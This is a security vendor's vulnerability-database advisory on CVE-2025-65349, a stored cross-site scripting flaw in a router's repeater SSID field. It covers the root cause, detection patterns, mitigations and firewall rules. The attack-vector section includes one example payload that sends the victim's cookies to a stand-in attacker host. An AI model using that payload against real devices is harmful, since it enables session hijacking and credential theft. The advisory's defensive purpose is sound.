The SentinelOne Annual Threat Report - A Defenders Guide from the FrontlinesThe SentinelOne Annual Threat ReportGet the Report
Experiencing a Breach?Blog
Get StartedContact Us
SentinelOne
  • Platform
    Platform Overview
    • Singularity Platform
      Welcome to Integrated Enterprise Security
    • AI for Security
      Leading the Way in AI-Powered Security Solutions
    • Securing AI
      Accelerate AI Adoption with Secure AI Tools, Apps, and Agents.
    • How It Works
      The Singularity XDR Difference
    • Singularity Marketplace
      One-Click Integrations to Unlock the Power of XDR
    • Pricing & Packaging
      Comparisons and Guidance at a Glance
    Data & AI
    • Purple AI
      Accelerate SecOps with Generative AI
    • Singularity Hyperautomation
      Easily Automate Security Processes
    • AI-SIEM
      The AI SIEM for the Autonomous SOC
    • Singularity Data Lake
      AI-Powered, Unified Data Lake
    • Singularity Data Lake for Log Analytics
      Seamlessly Ingest Data from On-Prem, Cloud or Hybrid Environments
    Endpoint Security
    • Singularity Endpoint
      Autonomous Prevention, Detection, and Response
    • Singularity XDR
      Native & Open Protection, Detection, and Response
    • Singularity RemoteOps Forensics
      Orchestrate Forensics at Scale
    • Singularity Threat Intelligence
      Comprehensive Adversary Intelligence
    • Singularity Vulnerability Management
      Application & OS Vulnerability Management
    • Singularity Identity
      Identity Threat Detection and Response
    Cloud Security
    • Singularity Cloud Security
      Block Attacks with an AI-Powered CNAPP
    • Singularity Cloud Native Security
      Secure Cloud and Development Resources
    • Singularity Cloud Workload Security
      Real-Time Cloud Workload Protection Platform
    • Singularity Cloud Data Security
      AI-Powered Threat Detection for Cloud Storage
    • Singularity Cloud Security Posture Management
      Detect and Remediate Cloud Misconfigurations
    Securing AI
    • Prompt Security
      Secure AI Tools Across Your Enterprise
  • Why SentinelOne?
    Why SentinelOne?
    • Why SentinelOne?
      Cybersecurity Built for What’s Next
    • Our Customers
      Trusted by the World’s Leading Enterprises
    • Industry Recognition
      Tested and Proven by the Experts
    • About Us
      The Industry Leader in Autonomous Cybersecurity
    Compare SentinelOne
    • Arctic Wolf
    • Broadcom
    • CrowdStrike
    • Cybereason
    • Microsoft
    • Palo Alto Networks
    • Sophos
    • Splunk
    • Trellix
    • Trend Micro
    • Wiz
    Verticals
    • Energy
    • Federal Government
    • Finance
    • Healthcare
    • Higher Education
    • K-12 Education
    • Manufacturing
    • Retail
    • State and Local Government
  • Services
    Managed Services
    • Managed Services Overview
      Wayfinder Threat Detection & Response
    • Threat Hunting
      World-Class Expertise and Threat Intelligence
    • Managed Detection & Response
      24/7/365 Expert MDR Across Your Entire Environment
    • Incident Readiness & Response
      DFIR, Breach Readiness, & Compromise Assessments
    Support, Deployment, & Health
    • Technical Account Management
      Customer Success with Personalized Service
    • SentinelOne GO
      Guided Onboarding & Deployment Advisory
    • SentinelOne University
      Live and On-Demand Training
    • Services Overview
      Comprehensive Solutions for Seamless Security Operations
    • SentinelOne Community
      Community Login
  • Partners
    Our Network
    • MSSP Partners
      Succeed Faster with SentinelOne
    • Singularity Marketplace
      Extend the Power of S1 Technology
    • Cyber Risk Partners
      Enlist Pro Response and Advisory Teams
    • Technology Alliances
      Integrated, Enterprise-Scale Solutions
    • SentinelOne for AWS
      Hosted in AWS Regions Around the World
    • Channel Partners
      Deliver the Right Solutions, Together
    • SentinelOne for Google Cloud
      Unified, Autonomous Security Giving Defenders the Advantage at Global Scale
    • Partner Locator
      Your Go-to Source for Our Top Partners in Your Region
    Partner Portal→
  • Resources
    Resource Center
    • Case Studies
    • Data Sheets
    • eBooks
    • Reports
    • Videos
    • Webinars
    • Whitepapers
    • Events
    View All Resources→
    Blog
    • Feature Spotlight
    • For CISO/CIO
    • From the Front Lines
    • Identity
    • Cloud
    • macOS
    • SentinelOne Blog
    Blog→
    Tech Resources
    • SentinelLABS
    • Ransomware Anthology
    • Cybersecurity 101
  • About
    About SentinelOne
    • About SentinelOne
      The Industry Leader in Cybersecurity
    • Investor Relations
      Financial Information & Events
    • SentinelLABS
      Threat Research for the Modern Threat Hunter
    • Careers
      The Latest Job Opportunities
    • Press & News
      Company Announcements
    • Cybersecurity Blog
      The Latest Cybersecurity Threats, News, & More
    • FAQ
      Get Answers to Our Most Frequently Asked Questions
    • DataSet
      The Live Data Platform
    • S Foundation
      Securing a Safer Future for All
    • S Ventures
      Investing in the Next Generation of Security, Data and AI
  • Pricing
Get StartedContact Us
CVE Vulnerability Database
Vulnerability Database/CVE-2025-65349

CVE-2025-65349: Each Italy Wireless Mini Router XSS Flaw

CVE-2025-65349 is a stored cross-site scripting vulnerability in Each Italy Wireless Mini Router WIRELESS-N 300M that enables attackers to execute malicious scripts. This article covers technical details, affected versions, and mitigation.

Published: January 23, 2026

CVE-2025-65349 Overview

A Stored Cross-Site Scripting (XSS) vulnerability exists in the web management interface of the Each Italy Wireless Mini Router WIRELESS-N 300M v28K.MiniRouter.20190211. This vulnerability allows attackers to execute arbitrary JavaScript code by injecting a crafted payload into the repeater AP SSID field. Due to insufficient input sanitization, malicious scripts are stored and subsequently executed whenever any page is accessed at /index.htm.

Critical Impact

Attackers can persistently execute malicious scripts in the context of authenticated users accessing the router's web management interface, potentially leading to session hijacking, credential theft, or unauthorized configuration changes.

Affected Products

  • Each Italy Wireless Mini Router WIRELESS-N 300M
  • Firmware version v28K.MiniRouter.20190211
  • Web management interface at /index.htm

Discovery Timeline

  • 2026-01-15 - CVE-2025-65349 published to NVD
  • 2026-01-16 - Last updated in NVD database

Technical Details for CVE-2025-65349

Vulnerability Analysis

This Stored Cross-Site Scripting vulnerability stems from improper input validation in the router's web management interface. When a user configures the repeater AP SSID setting, the input value is stored without proper sanitization. The malicious payload persists in the device's configuration and is subsequently rendered without encoding whenever any page under /index.htm is accessed.

The attack requires low privileges (authenticated access to the router) but can affect any user who subsequently accesses the management interface, including administrators. Because the scope is changed (the vulnerability in the router affects users' browsers), the malicious script executes in the security context of the victim's browser session.

Root Cause

The root cause is a failure to implement proper input sanitization and output encoding for the repeater AP SSID parameter. The web management interface directly embeds user-supplied input into HTML pages without escaping special characters such as <, >, ", and '. This allows attackers to break out of the intended context and inject arbitrary HTML or JavaScript code that persists across sessions and affects all users viewing the affected pages.

Attack Vector

The attack is network-based, requiring the attacker to have low-privileged access to the router's web management interface. The exploitation flow involves:

  1. The attacker authenticates to the router's web management interface
  2. The attacker navigates to the repeater/wireless configuration section
  3. A malicious JavaScript payload is injected into the AP SSID field (e.g., <script>document.location='http://attacker.com/steal?c='+document.cookie</script>)
  4. The payload is stored in the router's configuration without sanitization
  5. When any user (including administrators) accesses pages at /index.htm, the malicious script executes in their browser context

The vulnerability can be exploited to steal session cookies, perform actions on behalf of authenticated administrators, modify router configurations, or redirect users to phishing pages. Technical details and proof-of-concept information are available in the GitHub Security Advisory for CVE-2025-65349.

Detection Methods for CVE-2025-65349

Indicators of Compromise

  • Unusual or suspicious strings containing <script>, javascript:, onerror=, or similar XSS patterns in the repeater AP SSID configuration
  • Unexpected outbound connections from client browsers when accessing the router management interface
  • Modified SSID values containing encoded characters or HTML entities that don't correspond to legitimate network names
  • Browser console errors or unexpected script execution warnings when accessing /index.htm

Detection Strategies

  • Monitor router configuration changes, specifically watching for SSID values containing HTML tags or JavaScript code
  • Implement web application firewall (WAF) rules to detect XSS payloads in HTTP requests to the router management interface
  • Review access logs for the router's web interface for suspicious patterns or unusual parameter values
  • Use browser-based XSS detection extensions during administrative sessions to identify stored payload execution

Monitoring Recommendations

  • Enable logging on the router's web management interface if supported
  • Monitor network traffic for unusual data exfiltration patterns originating from administrative sessions
  • Regularly audit router configurations for unexpected changes to SSID and network parameters
  • Implement network segmentation to limit access to router management interfaces from untrusted networks

How to Mitigate CVE-2025-65349

Immediate Actions Required

  • Restrict access to the router's web management interface to trusted IP addresses only
  • Change administrative credentials and invalidate any existing sessions
  • Review and clean any suspicious entries in the repeater AP SSID configuration field
  • Consider disabling the web management interface temporarily if not required for operations
  • Implement network-level access controls to prevent unauthorized access to the management interface

Patch Information

No vendor patch information is currently available for this vulnerability. Users should monitor the GitHub Security Advisory for CVE-2025-65349 for updates and contact Each Italy for firmware update information.

Workarounds

  • Disable the web management interface and manage the router via alternative methods if available
  • Implement strict network segmentation to ensure only authorized administrators can access the management interface
  • Use a reverse proxy with XSS filtering capabilities in front of the management interface
  • Manually sanitize SSID values by removing any HTML tags or special characters from the configuration
  • Consider replacing the affected device with a router from a vendor that provides regular security updates
bash
# Example: Restrict management interface access via iptables (on upstream firewall)
# Only allow management access from trusted admin subnet
iptables -A FORWARD -d <router_ip> -p tcp --dport 80 -s 192.168.1.0/24 -j ACCEPT
iptables -A FORWARD -d <router_ip> -p tcp --dport 80 -j DROP

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

  • Vulnerability Details
  • TypeXSS

  • Vendor/TechEach Italy Wireless Mini Router

  • SeverityMEDIUM

  • CVSS Score5.4

  • EPSS Probability0.03%

  • Known ExploitedNo
  • CVSS Vector
  • CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
  • Impact Assessment
  • ConfidentialityLow
  • IntegrityLow
  • AvailabilityNone
  • CWE References
  • CWE-79
  • Technical References
  • GitHub Security Advisory CVE-2025-65349

  • Imgur Image Post
  • Latest CVEs
  • CVE-2025-70797: LimeSurvey XSS Vulnerability

  • CVE-2025-30650: Juniper Junos OS Auth Bypass Vulnerability

  • CVE-2026-35471: Goshs Path Traversal Vulnerability

  • CVE-2026-35393: Goshs Path Traversal Vulnerability
Default Legacy - Prefooter | Experience the World’s Most Advanced Cybersecurity Platform

Experience the World’s Most Advanced Cybersecurity Platform

See how our intelligent, autonomous cybersecurity platform can protect your organization now and into the future.

Try SentinelOne
  • Get Started
  • Get a Demo
  • Product Tour
  • Why SentinelOne
  • Pricing & Packaging
  • FAQ
  • Contact
  • Contact Us
  • Customer Support
  • SentinelOne Status
  • Language
  • Platform
  • Singularity Platform
  • Singularity Endpoint
  • Singularity Cloud
  • Singularity AI-SIEM
  • Singularity Identity
  • Singularity Marketplace
  • Purple AI
  • Services
  • Wayfinder TDR
  • SentinelOne GO
  • Technical Account Management
  • Support Services
  • Verticals
  • Energy
  • Federal Government
  • Finance
  • Healthcare
  • Higher Education
  • K-12 Education
  • Manufacturing
  • Retail
  • State and Local Government
  • Cybersecurity for SMB
  • Resources
  • Blog
  • Labs
  • Case Studies
  • Videos
  • Product Tours
  • Events
  • Cybersecurity 101
  • eBooks
  • Webinars
  • Whitepapers
  • Press
  • News
  • Ransomware Anthology
  • Company
  • About Us
  • Our Customers
  • Careers
  • Partners
  • Legal & Compliance
  • Security & Compliance
  • Investor Relations
  • S Foundation
  • S Ventures

©2026 SentinelOne, All Rights Reserved.

Privacy Notice Terms of Use

English